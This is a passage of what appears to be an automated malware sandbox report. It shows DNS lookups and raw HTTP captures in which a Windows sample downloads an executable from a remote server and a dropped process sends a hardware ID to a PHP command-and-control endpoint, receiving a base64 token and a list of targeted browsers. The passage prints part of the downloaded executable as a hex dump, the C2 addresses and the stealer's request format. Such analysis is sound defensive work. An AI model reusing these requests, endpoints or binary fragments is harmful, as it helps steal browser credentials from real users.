                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.328742981 CEST1.1.1.1192.168.2.50xa22eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.328742981 CEST1.1.1.1192.168.2.50xa22eNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:22.449815035 CEST1.1.1.1192.168.2.50xb20bNo error (0)svc.iolo.com20.157.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.990607023 CEST1.1.1.1192.168.2.50xd330No error (0)download.iolo.netiolo0.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:27.990607023 CEST1.1.1.1192.168.2.50xd330No error (0)iolo0.b-cdn.net185.93.1.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:29:05.638653040 CEST1.1.1.1192.168.2.50x714fNo error (0)westus2-2.in.applicationinsights.azure.comwestus2-2.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:29:05.638653040 CEST1.1.1.1192.168.2.50x714fNo error (0)westus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:29:05.638653040 CEST1.1.1.1192.168.2.50x714fNo error (0)westus2-2.in.ai.privatelink.monitor.azure.comgig-ai-prod-westus2-0.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:29:16.255341053 CEST1.1.1.1192.168.2.50x249eNo error (0)windowsupdatebg.s.llnwi.net69.164.42.0A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.549705185.172.128.90805148C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:56.592477083 CEST206OUTGET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.90
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.174693108 CEST148INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:27:56 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 1
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 30
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.549706185.172.128.228805148C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.389693022 CEST192OUTGET /ping.php?substr=eight HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.228
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.592356920 CEST147INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:27:58 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      2192.168.2.549707185.172.128.59805148C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.807173014 CEST181OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.59
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010128021 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:27:58 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Apr 2024 07:15:01 GMT
                                                                                                                                                                                                                                                                                      ETag: "52200-616be4ffa1b6b"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 336384
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 05 86 02 15 41 e7 6c 46 41 e7 6c 46 41 e7 6c 46 4c b5 b3 46 59 e7 6c 46 4c b5 8c 46 39 e7 6c 46 4c b5 8d 46 6d e7 6c 46 48 9f ff 46 46 e7 6c 46 41 e7 6d 46 2f e7 6c 46 f4 79 89 46 40 e7 6c 46 4c b5 b7 46 40 e7 6c 46 f4 79 b2 46 40 e7 6c 46 52 69 63 68 41 e7 6c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 82 38 12 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 de 00 00 00 66 c3 03 00 00 00 00 45 39 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 c4 03 00 04 00 00 b8 67 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 51 01 00 50 00 00 00 00 30 c2 03 d0 1d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 47 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e3 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 6b 00 00 00 f0 00 00 00 6c 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 c6 c0 03 00 60 01 00 00 b6 01 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1d 02 00 00 30 c2 03 00 1e 02 00 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 b4 15 02 04 e8 2f 02 00 00 68 d9 ed
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AlFAlFAlFLFYlFLF9lFLFmlFHFFlFAmF/lFyF@lFLF@lFyF@lFRichAlFPEL8efE9@PgQP08G@.text `.rdata kl@@.data`N@.rsrc0@@/h
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010210037 CEST1289INData Raw: 40 00 e8 ff 22 00 00 59 c3 b9 bc 15 02 04 e8 82 02 00 00 68 cf ed 40 00 e8 e9 22 00 00 59 c3 b9 a8 15 02 04 e8 d9 02 00 00 68 c5 ed 40 00 e8 d3 22 00 00 59 c3 6a 00 b9 b0 15 02 04 e8 cf 00 00 00 c3 6a 00 b9 a4 15 02 04 e8 c2 00 00 00 c3 6a 00 b9
                                                                                                                                                                                                                                                                                      Data Ascii: @"Yh@"Yh@"YjjjjUVEP$A^]$AfUVEtV"Y^]UE]UE8u3]P}Y]U}uE]]FU}
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010227919 CEST1289INData Raw: 53 8d 45 a8 50 53 ff 15 8c f0 40 00 53 53 53 53 ff 15 40 f0 40 00 8b 45 f0 8b 0d 98 15 02 04 2b f8 89 7d dc 83 f9 0c 75 07 53 ff 15 84 f0 40 00 8b c7 c1 e0 04 89 45 fc 8b 45 d4 01 45 fc 89 5d ec 8b 45 f8 01 45 ec 8b 45 dc 90 01 45 ec 8b 45 ec 89
                                                                                                                                                                                                                                                                                      Data Ascii: SEPS@SSSS@@E+}uS@EEE]EEEEEEMEEEEMU3E3U*E)EMt]UuE~_^[]V5W=tNu_^UQeEE]UQQhEAT
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010246038 CEST1289INData Raw: 3d 98 15 02 04 00 04 00 00 75 4f 57 57 57 ff 15 4c f0 40 00 57 57 57 57 ff 15 64 f0 40 00 57 ff 15 08 f0 40 00 57 57 57 57 ff 15 74 f0 40 00 57 57 57 57 ff 15 84 f1 40 00 57 e8 c6 15 00 00 57 e8 0b 1b 00 00 57 e8 7c 1b 00 00 57 e8 f3 18 00 00 57
                                                                                                                                                                                                                                                                                      Data Ascii: =uOWWWL@WWWWd@W@WWWWt@WWWW@WWW|WW@8q Fr|Wx@{+F|@WD@W<@X~}5EzuFT||A=u@Nu_3^]U
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010262012 CEST1289INData Raw: 0c 00 76 14 ff 75 0c 8b cf e8 07 ff ff ff 50 53 e8 a9 f1 ff ff 83 c4 0c 6a 00 6a 01 8b cf e8 a3 fc ff ff 8d 45 e8 8b cf 50 57 8d 45 ee 50 e8 02 fd ff ff 8b c8 e8 6c 00 00 00 ff 75 0c 8b cf 89 77 14 e8 e5 fd ff ff 8b 4d f4 5f 5e 64 89 0d 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: vuPSjjEPWEPluwM_^d[]Mjj`jj>UuY]U]UM.]UVM/UP'^]3twQYuUVWM
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010277987 CEST1289INData Raw: f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 78 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 78 25 40 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 8c 24 40 00 ff 24 8d
                                                                                                                                                                                                                                                                                      Data Ascii: ~vfx%@ur*$x%@r$$@$%@$%@$@$@$@#FGFGr$x%@I#FGr$x%@#r$x%@Io%@\%@T%@L%@D%@<%@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010297060 CEST1289INData Raw: 00 eb 06 8b 47 04 89 46 04 5f 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 c7 06 34 00 41 00 e8 52 00 00 00 f6 45 08 01 74 07 56 e8 e2 09 00 00 59 8b c6 5e 5d c2 04 00 55 8b ec 83 7d 08 00 53 8b d9 74 2d 57 ff 75 08 e8 db 06 00 00 8d 78 01 57 e8 ea 19
                                                                                                                                                                                                                                                                                      Data Ascii: GF_^]UV4AREtVY^]U}St-WuxWCYYtuWPiC_[]V~tveYfF^Au<AWVt$L$|$;v;h%PCs3u%`
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010314941 CEST1289INData Raw: 40 00 8d 49 00 68 2e 40 00 70 2e 40 00 78 2e 40 00 80 2e 40 00 88 2e 40 00 90 2e 40 00 98 2e 40 00 ab 2e 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89
                                                                                                                                                                                                                                                                                      Data Ascii: @Ih.@p.@x.@.@.@.@.@.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fof
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010333061 CEST1289INData Raw: fc ff ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 6e 21 00 00 83 c4 0c 5d c3 6a 10 68 88 4d 41 00 e8 11 12 00 00 83 cf ff 89 7d e4 33 c0 39 45 08 0f 95 c0 85 c0 75 18 e8 9e 0f 00 00 c7 00 16 00 00 00 e8 24 0f 00 00 8b c7 e8 2d 12 00 00 c3 e8 70 14 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: Ujjun!]jhMA}39Eu$-p @@uYP"Y;ttpCXeA@$u;ttpCXeAB$u PjCYYe PEu1 PVju
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010350943 CEST1289INData Raw: d6 89 45 d8 ff 35 90 26 02 04 ff d6 8b 4d d8 39 4d e4 75 05 39 45 e0 74 ae 89 4d e4 8b d9 89 5d d4 89 45 e0 8b f8 eb 9c 68 e4 f1 40 00 68 d4 f1 40 00 e8 bb fe ff ff 59 59 68 ec f1 40 00 68 e8 f1 40 00 e8 aa fe ff ff 59 59 c7 45 fc fe ff ff ff e8
                                                                                                                                                                                                                                                                                      Data Ascii: E5&M9Mu9EtM]Eh@h@YYh@h@YYE }u)Cj'Yu\}tj'YUjju]Uul/YtugYt]jEE@PMh|LAEE@P}@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213397026 CEST1289INData Raw: ec 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d c8 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 c8 64 a3 00 00 00 00 8b 45 fc 5b 8b e5 5d c3 55 8b ec 51 51 8b 45 08 53 8b 5d 0c 56 8b 70 0c 8b 48 10 89 4d f8 89 75 fc 57 8b fe 85 db 78 33 8b 55 10 83 fe ff
                                                                                                                                                                                                                                                                                      Data Ascii: td]dEdE[]UQQES]VpHMuWx3Uu)*MUNk9T};T~u}KuyEF0E8E;xw;v)Mk_^[]UQSEEddE]mc[]UQQSVWd5uEd>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      3192.168.2.549708185.172.128.76806300C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:00.837763071 CEST417OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 216
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 43 33 43 30 30 35 46 39 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="hwid"59C3C005F9E64120021454------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build"default10------JEGHJKFHJJJKJJJJKEHC--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.222677946 CEST347INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Data Raw: 4f 54 4d 30 59 7a 4d 32 4d 6d 59 79 4d 7a 51 31 59 6a 4d 34 59 57 55 30 4d 7a 51 34 4f 47 46 6c 59 7a 41 32 59 57 4e 6b 4d 57 55 31 5a 54 6b 35 4d 6a 46 6c 4d 44 67 34 59 32 4d 35 4d 44 59 7a 4d 54 55 35 4e 54 42 6c 4d 6a 63 79 4f 54 59 31 4e 32 46 6b 4e 6a 63 33 4e 57 4a 6d 5a 6a 6b 35 66 44 45 34 4d 54 67 78 4e 6a 5a 38 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 56 38 4d 58 77 77 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 41 3d 3d
                                                                                                                                                                                                                                                                                      Data Ascii: OTM0YzM2MmYyMzQ1YjM4YWU0MzQ4OGFlYzA2YWNkMWU1ZTk5MjFlMDg4Y2M5MDYzMTU5NTBlMjcyOTY1N2FkNjc3NWJmZjk5fDE4MTgxNjZ8NTE5MTkxODg1LmZpbGV8MXwwfDF8MXwxfDF8MXwxfA==
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.224149942 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFI
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 268
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"browsers------FBFCGIDAKECGCBGDBAFI--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.538180113 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 1520
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62
